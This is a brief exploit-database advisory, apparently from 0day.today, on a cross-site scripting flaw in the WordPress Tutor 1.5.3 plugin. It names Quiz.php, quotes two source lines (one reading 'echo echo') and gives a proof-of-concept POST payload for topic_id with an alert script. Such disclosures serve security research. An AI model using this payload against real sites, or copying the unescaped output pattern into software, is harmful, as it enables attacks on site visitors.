id: 33957
date: 02/12/2020
title: WordPress Tutor 1.5.3 Cross Site Scripting Vulnerability
author: Mehran Feizi
cves: 

[-] Tile: Wordpress Plugin tutor.1.5.3 - Cross-Site Scripting
[-] Author: mehran feizi
[-] Category: webapps
===================================================================
Vulnerable page:
/Quiz.php
===================================================================
Vulnerable Source:
473: echo echo $topic_id;
447: $topic_id = sanitize_text_field($_POST['topic_id']);
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/classes/Quiz.php     and
$_POST('topic_id')=   <script>alert('mehran')</script>
=================================================================================

#  0day.today [2023-03-23]  #